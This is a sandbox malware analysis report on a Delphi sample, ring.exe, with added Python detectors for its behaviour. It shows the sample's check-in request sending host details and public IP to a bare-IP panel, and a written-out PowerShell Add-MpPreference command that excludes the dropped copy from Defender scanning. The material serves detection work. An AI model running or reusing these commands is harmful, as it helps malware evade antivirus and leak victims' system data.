Nov 19, 2024 20:36:12.183645010 CET | 59931 | 53 | 192.168.2.7 | 1.1.1.1
Nov 19, 2024 20:36:12.190618038 CET | 53 | 59931 | 1.1.1.1 | 192.168.2.7
Nov 19, 2024 20:36:17.245806932 CET | 57488 | 53 | 192.168.2.7 | 1.1.1.1
Nov 19, 2024 20:36:17.379138947 CET | 53 | 57488 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 19, 2024 20:36:12.183645010 CET | 192.168.2.7 | 1.1.1.1 | 0x4a00 | Standard query (0) | api64.ipify.org | A (IP address) | IN (0x0001) | false
Nov 19, 2024 20:36:17.245806932 CET | 192.168.2.7 | 1.1.1.1 | 0x18fc | Standard query (0) | adsklbb.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 19, 2024 20:36:12.190618038 CET | 1.1.1.1 | 192.168.2.7 | 0x4a00 | No error (0) | api64.ipify.org | | 104.237.62.213 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 20:36:12.190618038 CET | 1.1.1.1 | 192.168.2.7 | 0x4a00 | No error (0) | api64.ipify.org | | 173.231.16.77 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 20:36:17.379138947 CET | 1.1.1.1 | 192.168.2.7 | 0x18fc | No error (0) | adsklbb.org | | 24.152.39.13 | A (IP address) | IN (0x0001) | false
                              • api64.ipify.org
                              • 154.205.156.20
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 104.237.62.213 | 80 | 6300 | C:\Users\user\Desktop\ring.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 20:36:12.198534012 CET | 178 | OUT | GET /?format=text HTTP/1.1
                              Host: api64.ipify.org
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              User-Agent: Mozilla/3.0 (compatible; Indy Library)
Nov 19, 2024 20:36:12.784324884 CET | 166 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Tue, 19 Nov 2024 19:36:12 GMT
                              Content-Type: text/plain
                              Content-Length: 11
                              Connection: keep-alive
                              Vary: Origin
                              Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                              Data Ascii: 8.46.123.75


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49702 | 154.205.156.20 | 80 | 6300 | C:\Users\user\Desktop\ring.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 20:36:14.650507927 CET | 275 | OUT | GET /Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75 HTTP/1.1
                              User-Agent: Delphi 5.x
                              Host: 154.205.156.20
                              Cache-Control: no-cache
                              Nov 19, 2024 20:36:15.313024044 CET372INHTTP/1.1 200 OK
                              Date: Tue, 19 Nov 2024 19:36:15 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Vary: Accept-Encoding
                              Content-Length: 200
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 44 61 64 6f 73 20 52 65 63 65 62 69 64 6f 73 3a 3c 62 72 3e 4e 6f 6d 65 20 64 6f 20 50 43 3a 20 39 36 30 37 38 31 3c 62 72 3e 56 65 72 73 c3 a3 6f 20 64 6f 20 57 69 6e 64 6f 77 73 3a 20 57 69 6e 64 6f 77 73 20 31 30 2e 30 20 28 42 75 69 6c 64 20 31 39 30 34 35 29 20 3c 62 72 3e c3 9a 6c 74 69 6d 61 20 41 74 75 61 6c 69 7a 61 c3 a7 c3 a3 6f 3a 20 32 30 32 34 2d 31 31 2d 31 39 3c 62 72 3e 53 74 61 74 75 73 3a 20 49 6e 73 74 61 6c 61 64 61 3c 62 72 3e 44 61 64 6f 73 20 73 61 6c 76 6f 73 20 63 6f 6d 20 73 75 63 65 73 73 6f 20 6e 6f 20 61 72 71 75 69 76 6f 20 64 65 73 6b 74 6f 70 73 2e 74 78 74 21
                              Data Ascii: Dados Recebidos:<br>Nome do PC: 960781<br>Verso do Windows: Windows 10.0 (Build 19045) <br>ltima Atualizao: 2024-11-19<br>Status: Instalada<br>Dados salvos com sucesso no arquivo desktops.txt!


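Added example, not part of the Joe Sandbox report: a small Python detector for the two-step pattern in the two sessions above. ring.exe (PID 6300) first asks api64.ipify.org for its public address, sending the Indy Library default User-Agent, and two seconds later reports that address together with a host identifier, the Windows build, a date and an install status to 154.205.156.20 via /Painel/atualizar_dados.php with the "Delphi 5.x" User-Agent. Both User-Agents are library defaults that no browser sends, and the panel's reply confirms the fields were written to a file. HTTP_RECORDS is constructed from the capture; the record schema, the detect() rule and the extra ipify host names are this example's assumptions, not anything the report states.

```python
"""Flag the public-IP lookup followed by the Delphi check-in seen in this report.

Added example, not part of the Joe Sandbox report. HTTP_RECORDS is constructed
from the two sessions above (same PID, hosts, paths, User-Agents and bodies);
the record schema and the detect() rule are this example's own choices.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed from the capture: one record per request, with the reply body.
HTTP_RECORDS = [
    {"pid": 6300, "host": "api64.ipify.org", "uri": "/?format=text",
     "ua": "Mozilla/3.0 (compatible; Indy Library)", "resp_body": "8.46.123.75"},
    {"pid": 6300, "host": "154.205.156.20",
     "uri": "/Painel/atualizar_dados.php?nome_pc=960781"
            "&versao_windows=Windows%2010.0%20%28Build%2019045%29%20"
            "&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A"
            "&status=Instalada&ip=8.46.123.75",
     "ua": "Delphi 5.x", "resp_body": "Dados Recebidos:<br>..."},
]

# api64 is what this sample used; the other ipify names are an assumption
# about where a variant might look instead.
IP_LOOKUP_HOSTS = {"api64.ipify.org", "api.ipify.org", "api4.ipify.org", "api6.ipify.org"}
# Library defaults that a real browser never sends (both observed above).
LIBRARY_DEFAULT_UAS = {"Mozilla/3.0 (compatible; Indy Library)", "Delphi 5.x"}
CHECKIN_PATH = "/Painel/atualizar_dados.php"


def checkin_fields(uri):
    """Return the key/value pairs leaked in the query string (first value per key)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(uri).query).items()}


def detect(records):
    """Alert on a process that learns its public IP and then reports it elsewhere."""
    learned_ip = {}          # pid -> address returned by an ipify-style service
    alerts = []
    for r in records:
        if r["host"] in IP_LOOKUP_HOSTS:
            learned_ip[r["pid"]] = r["resp_body"].strip()
            continue
        fields = checkin_fields(r["uri"])
        reasons = []
        if r["ua"] in LIBRARY_DEFAULT_UAS:
            reasons.append("library default User-Agent")
        if fields.get("ip") and fields["ip"] == learned_ip.get(r["pid"]):
            reasons.append("reports the public IP it just looked up")
        if urlsplit(r["uri"]).path == CHECKIN_PATH:
            reasons.append("check-in path seen in this sample")
        if reasons:
            alerts.append({"pid": r["pid"], "host": r["host"],
                           "reasons": reasons, "fields": fields})
    return alerts


if __name__ == "__main__":
    for a in detect(HTTP_RECORDS):
        print(a["pid"], a["host"], "; ".join(a["reasons"]))
        for k, v in a["fields"].items():
            print(f"  {k} = {v!r}")
```

The correlation on the looked-up address is the part worth keeping in a real rule: the User-Agent strings and the panel path are trivial for the operator to change, whereas a process that fetches its own public IP and then sends that value in a request parameter to a bare-IP host is characteristic of this kind of Delphi check-in regardless of the strings.
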

                              Target ID: 4
                              Start time: 14:36:10
                              Start date: 19/11/2024
                              Path: C:\Users\user\Desktop\ring.exe
                              Wow64 process (32bit): true
                              Commandline: "C:\Users\user\Desktop\ring.exe"
                              Imagebase: 0x7c0000
                              File size: 17'488'384 bytes
                              MD5 hash: DEC85DE31C5A9E3754AB0FCFED8A3E79
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: Borland Delphi
                              Reputation: low
                              Has exited: false

                              Target ID: 8
                              Start time: 14:36:15
                              Start date: 19/11/2024
                              Path: C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit): true
                              Commandline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
                              Imagebase: 0x410000
                              File size: 236'544 bytes
                              MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: C, C++ or other language
                              Reputation: high
                              Has exited: true

                              Target ID: 9
                              Start time: 14:36:15
                              Start date: 19/11/2024
                              Path: C:\Windows\System32\conhost.exe
                              Wow64 process (32bit): false
                              Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase: 0x7ff75da10000
                              File size: 862'208 bytes
                              MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: C, C++ or other language
                              Reputation: high
                              Has exited: true

                              Target ID: 10
                              Start time: 14:36:15
                              Start date: 19/11/2024
                              Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit): true
                              Commandline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
                              Imagebase: 0x6f0000
                              File size: 433'152 bytes
                              MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: C, C++ or other language
                              Reputation: high
                              Has exited: true

                              Target ID: 11
                              Start time: 14:36:18
                              Start date: 19/11/2024
                              Path: C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit): false
                              Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase: 0x7ff7fb730000
                              File size: 496'640 bytes
                              MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges: true
                              Has administrator privileges: false
                              Programmed in: C, C++ or other language
                              Reputation: high
                              Has exited: false

                              Target ID: 13
                              Start time: 14:36:28
                              Start date: 19/11/2024
                              Path: C:\Users\user\AppData\Roaming\Win_24230\ring.exe
                              Wow64 process (32bit): true
                              Commandline: "C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
                              Imagebase: 0xcb0000
                              File size: 17'488'384 bytes
                              MD5 hash: DEC85DE31C5A9E3754AB0FCFED8A3E79
                              Has elevated privileges: false
                              Has administrator privileges: false
                              Programmed in: Borland Delphi
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 18%, ReversingLabs
                              Reputation: low
                              Has exited: true

                              Target ID: 14
                              Start time: 15:37:19
                              Start date: 19/11/2024
                              Path: C:\Users\user\AppData\Roaming\Win_24230\ring.exe
                              Wow64 process (32bit): true
                              Commandline: "C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
                              Imagebase: 0xcb0000
                              File size: 17'488'384 bytes
                              MD5 hash: DEC85DE31C5A9E3754AB0FCFED8A3E79
                              Has elevated privileges: false
                              Has administrator privileges: false
                              Programmed in: Borland Delphi
                              Reputation: low
                              Has exited: true

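Added example, not part of the Joe Sandbox report: the process list above shows the elevated first instance of ring.exe (Target ID 4) spawning cmd.exe and powershell.exe (Target IDs 8 and 10) to run Add-MpPreference -ExclusionPath against C:\Users\user\AppData\Roaming\Win_24230\ring.exe, and that same file then executing as Target IDs 13 and 14 with the same MD5 as the original sample. The Python below runs that correlation over constructed process-creation events: it extracts the excluded path from the command line and pairs it with any later process whose image is the excluded file or lies under the excluded directory. It goes beyond this run in one respect, also decoding an -EncodedCommand form of the cmdlet, which this sample did not use (it passed the cmdlet in clear text via -Command). The PIDs other than 6300, the event schema and the encoded event are this example's own constructions.

```python
"""Tie a Defender exclusion added from the command line to the copy that later runs.

Added example, not part of the Joe Sandbox report. EVENTS is constructed from
Target IDs 4, 8, 10 and 13 above; the PIDs other than 6300, the event schema and
the -EncodedCommand event (not used by this sample) are this example's own.
"""
import base64
import re

DROP_DIR = r"C:\Users\user\AppData\Roaming\Win_24230"
DROPPED = DROP_DIR + r"\ring.exe"
CMDLET = f"Add-MpPreference -ExclusionPath '{DROPPED}'"


def encoded(ps):
    """Build the form PowerShell accepts after -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events modelled on the process list above.
EVENTS = [
    {"pid": 6300, "ppid": 1, "image": r"C:\Users\user\Desktop\ring.exe",
     "cmd": r'"C:\Users\user\Desktop\ring.exe"'},
    {"pid": 6408, "ppid": 6300, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": f'"C:\\Windows\\System32\\cmd.exe" /c powershell -Command "{CMDLET}"'},
    {"pid": 6420, "ppid": 6408,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": f'powershell -Command "{CMDLET}"'},
    {"pid": 6540, "ppid": 6300, "image": DROPPED, "cmd": f'"{DROPPED}"'},
    # Constructed variant, not seen in this run: whole directory, base64-wrapped.
    {"pid": 6600, "ppid": 6300,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -NoProfile -EncodedCommand "
            + encoded(f"Add-MpPreference -ExclusionPath '{DROP_DIR}'")},
]

EXCLUSION_RE = re.compile(
    r"""(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+['"]?([^'"]+)""",
    re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def visible_powershell(cmd):
    """Return cmd with an -EncodedCommand payload replaced by its decoded text."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd                      # not a real payload; leave it alone
    return cmd[:m.start()] + decoded


def exclusions_added(events):
    """Return (pid, excluded path) for every event that adds a Defender exclusion."""
    found = []
    for ev in events:
        m = EXCLUSION_RE.search(visible_powershell(ev["cmd"]))
        if m:
            found.append((ev["pid"], m.group(1).strip()))
    return found


def exclusion_then_execution(events):
    """Pair each exclusion with a process whose image is the excluded file or sits under the excluded directory."""
    hits = []
    for pid, path in exclusions_added(events):
        p = path.lower().rstrip("\\")
        for ev in events:
            img = ev["image"].lower()
            if img == p or img.startswith(p + "\\"):
                hits.append({"excluding_pid": pid, "excluded": path, "ran_as_pid": ev["pid"]})
    return hits


if __name__ == "__main__":
    for h in exclusion_then_execution(EVENTS):
        print(f"pid {h['excluding_pid']} excluded {h['excluded']}; pid {h['ran_as_pid']} then ran from it")
```

Both the cmd.exe and the powershell.exe creation events carry the cmdlet, so a command-line rule fires twice for one exclusion; the pairing with the later execution from the excluded path is what turns the two noisy hits into a single finding that the exclusion was added for the dropped copy of the sample.
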
                              No disassembly